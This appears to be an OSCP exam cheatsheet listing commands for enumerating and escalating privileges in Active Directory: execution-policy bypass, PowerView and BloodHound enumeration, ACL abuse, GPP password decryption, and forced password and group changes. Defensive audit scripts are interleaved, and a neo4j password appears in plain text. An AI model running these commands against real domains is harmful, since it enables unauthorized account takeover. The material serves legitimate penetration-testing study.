OSCP Cheatsheet
Active Directory

Enumeration

NOTE: The goal is to escalate privileges to Domain Administrator.

Initial Access

RDP

xfreerdp3 /u:'<Username>' /d:'<Domain Name>' /p:'<Password>' /v:<Target IP Address> /dynamic-resolution +clipboard /drive:/home/kali/offsec/downloads,/shared

Enumeration

Manual

NOTE: Make sure to run the following first (it starts PowerShell with the execution policy bypassed so the scripts below can be loaded):

powershell -ep bypass

Get users on domain

net user /domain

Get info on particular user

net user <Username> /domain

Get groups on domain

net group /domain

Get info on a particular (custom) group

net group "<Group Name>" /domain

To enumerate users and groups with custom LDAP queries, create a script file and paste the function below into it

New-Item "<Path/to/script.ps1>"
notepad "<Path/to/script.ps1>"

Script:
function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName

    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

    return $DirectorySearcher.FindAll()

}

Import the module into powershell

Import-Module "<Path/to/script.ps1>"

To enumerate users

LDAPSearch -LDAPQuery "(samAccountType=805306368)"

To enumerate groups

LDAPSearch -LDAPQuery "(objectclass=group)"

To display members of each group

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {$group.properties | select {$_.cn}, {$_.member}}

To display detailed members of a particular group

$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=<Group Name>))"
$group.properties.member

To display detailed information of a particular member

$user = LDAPSearch -LDAPQuery "(&(objectCategory=user)(cn=<Username>))"
$user.properties
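As an added example (not part of the original cheatsheet), here is a paged variant of the LDAPSearch function above. A DirectorySearcher without PageSize is capped by the domain's MaxPageSize policy (1000 results by default), so large user or group listings are silently truncated; PropertiesToLoad keeps the result set small, and the second function flattens group membership into one row per member, which is easier to diff between audits. The function names LDAPSearchPaged and Get-GroupMembership are assumptions made here, not names from the page.

```powershell
# Added example, not from the original cheatsheet. Paged version of the
# LDAPSearch function: without PageSize the server's MaxPageSize policy
# (1000 by default) silently truncates large result sets.
function LDAPSearchPaged {
    param(
        [Parameter(Mandatory)][string]$LDAPQuery,
        [string[]]$Properties = @('samaccountname', 'cn', 'member', 'memberof'),
        [int]$PageSize = 1000
    )
    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName
    $entry    = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($entry, $LDAPQuery)
    $searcher.PageSize = $PageSize               # enables paged results (LDAP control 1.2.840.113556.1.4.319)
    $searcher.PropertiesToLoad.AddRange($Properties)
    return $searcher.FindAll()
}

# Flatten group membership into (Group, MemberDN) rows. Property names in
# ResultPropertyCollection are lowercase; an empty group has no 'member' values.
function Get-GroupMembership {
    foreach ($g in LDAPSearchPaged -LDAPQuery '(objectCategory=group)' -Properties @('cn', 'member')) {
        $groupCn = [string]$g.Properties['cn'][0]
        foreach ($m in @($g.Properties['member'])) {
            [pscustomobject]@{ Group = $groupCn; MemberDN = [string]$m }
        }
    }
}

Get-GroupMembership | Sort-Object Group, MemberDN | Format-Table -AutoSize
```

Save the output of Get-GroupMembership from one run and compare it with a later run (for example with Compare-Object) to spot membership changes in privileged groups.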

Powerview

Import Powerview

Import-Module C:\Tools\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To get filtered result

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select cn, pwdlastset ,lastlogon

To get specific information of a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To get filtered result

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information of a particular group

Get-NetGroup <Group Name>

Enumerate Computers in the Domain

Get-NetComputer

To get filtered result

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information of a particular computer

Get-NetComputer <DNS Host Name>

To look for machines on which the current user has local administrative rights

Find-LocalAdminAccess

To list users logged on to a target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: If no sessions come back, check the permissions described below.

Permissions for NetSessionEnum are defined by the security descriptor stored in the SrvsvcSessionInfo value under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity.

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: The remote machine must have the Remote Registry service enabled.

To check the permissions on a registry key

Get-Acl -Path <Registry Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
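The Get-Acl command above shows the ACL of the DefaultSecurity key itself, which is not what NetSessionEnum checks: the effective permission is a binary security descriptor stored inside the SrvsvcSessionInfo value. The following added example (not from the original cheatsheet) decodes that descriptor on the local machine and flags an Allow entry for Authenticated Users (S-1-5-11), which means every domain user can enumerate sessions; the hardening script NetCease works by removing that entry. The function name Get-NetSessionEnumAccess is an assumption made here.

```powershell
# Added example, not from the original cheatsheet: decode the security descriptor
# that governs NetSessionEnum. It is stored as REG_BINARY in the SrvsvcSessionInfo
# value, not in the ACL of the DefaultSecurity key that Get-Acl displays.
# Run locally on the server being checked (or wrap it in Invoke-Command).
function Get-NetSessionEnumAccess {
    $keyPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
    $raw = (Get-ItemProperty -Path $keyPath -Name SrvsvcSessionInfo).SrvsvcSessionInfo   # byte[]
    $sd  = New-Object System.Security.AccessControl.RawSecurityDescriptor($raw, 0)

    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = '<unresolved>' }
        [pscustomobject]@{
            Principal   = $name
            SID         = $sid.Value
            AceType     = $ace.AceType
            AccessMask  = ('0x{0:X8}' -f $ace.AccessMask)
            # S-1-5-11 = Authenticated Users. An Allow ACE here lets any domain
            # user enumerate sessions on this host (the entry NetCease removes).
            BroadAccess = ($sid.Value -eq 'S-1-5-11' -and $ace.AceType -eq 'AccessAllowed')
        }
    }
}

Get-NetSessionEnumAccess | Format-Table -AutoSize
```

Rows with BroadAccess = True are the ones to review: on hosts where only administrators need session information, removing the Authenticated Users entry from this descriptor stops Get-NetSession-style enumeration by ordinary domain accounts.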

To enumerate Service Principal Names

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To enumerate ACEs

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier

To enumerate interesting ACLs

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -notmatch "DnsAdmins"} | ft

To enumerate all ACEs on a group that grant ActiveDirectoryRights = GenericAll

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To enumerate all ACEs on a group that grant ActiveDirectoryRights = GenericWrite

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

To convert SID to Name in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert SID to Name individually

Convert-SidToName "<SID>"
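The GenericAll and GenericWrite filters above use -eq, so an ACE whose rights are a combination (for example "WriteDacl, WriteOwner") is not matched. The following added example (not part of the original cheatsheet) combines the ACE enumeration and the SID-to-name conversion into one audit: it splits the rights string, matches a list of write-class rights, skips the principals expected to hold full control (SYSTEM, Builtin Administrators, Domain Admins, Enterprise Admins), and resolves the remaining SIDs. It assumes PowerView is already imported; the function name Find-RiskyGroupAce and the rights beyond GenericAll/GenericWrite in the default list are assumptions made here.

```powershell
# Added example, not from the original cheatsheet. Requires PowerView
# (Get-ObjectAcl and Convert-SidToName) to be imported first.
function Find-RiskyGroupAce {
    param(
        [Parameter(Mandatory)][string]$GroupName,
        # Rights that let the holder change the group or its membership. The
        # entries after GenericWrite are an assumption added for this audit.
        [string[]]$RiskyRights = @('GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner', 'WriteProperty', 'Self')
    )
    # SYSTEM, Builtin Administrators, Domain Admins (RID 512), Enterprise Admins (RID 519)
    $expectedSidPattern = '^S-1-5-18$|^S-1-5-32-544$|-512$|-519$'

    Get-ObjectAcl -Identity $GroupName | ForEach-Object {
        $sid    = "$($_.SecurityIdentifier)"                       # works for SID objects and strings
        $rights = $_.ActiveDirectoryRights.ToString() -split ',\s*'  # flags enum -> individual names
        $hits   = $rights | Where-Object { $RiskyRights -contains $_ }
        if ($hits -and $sid -notmatch $expectedSidPattern -and $_.AceType -notmatch 'Denied') {
            [pscustomobject]@{
                Group     = $GroupName
                Principal = Convert-SidToName $sid
                SID       = $sid
                Rights    = ($hits -join ', ')
                AceType   = $_.AceType
            }
        }
    }
}

Find-RiskyGroupAce -GroupName '<Group Name>' | Format-Table -AutoSize
```

Any row returned is a principal outside the expected administrative set that can modify the group; each one should be traceable to a documented delegation, and unexplained entries are candidates for removal.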

Add a user to a group in the domain

net group "<Group Name>" <Username> /add /domain

To enumerate all shares in the domain

Find-DomainShare

To enumerate shares available to current user

Find-DomainShare -CheckShareAccess

To list the contents of a share

ls \\<Computer Name>\<Share Name>

To decrypt a Group Policy Preferences (cpassword) value found in AD

gpp-decrypt '<Hashed Password>'

NOTE: The above command is to be executed on the Kali machine.

BloodHound

To import BloodHound

Import-Module C:\Tools\Bloodhound.ps1

To begin enumeration with BloodHound

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On Kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161

Additional Things

Change password (Must have permission on the user)

net user <Username> <New Password> /domain
runas /user:<Domain Name>\<Username> cmd.exe

Add user to group (Must have permission on the group)

net group "<Group Name>" <Username> /add /domain
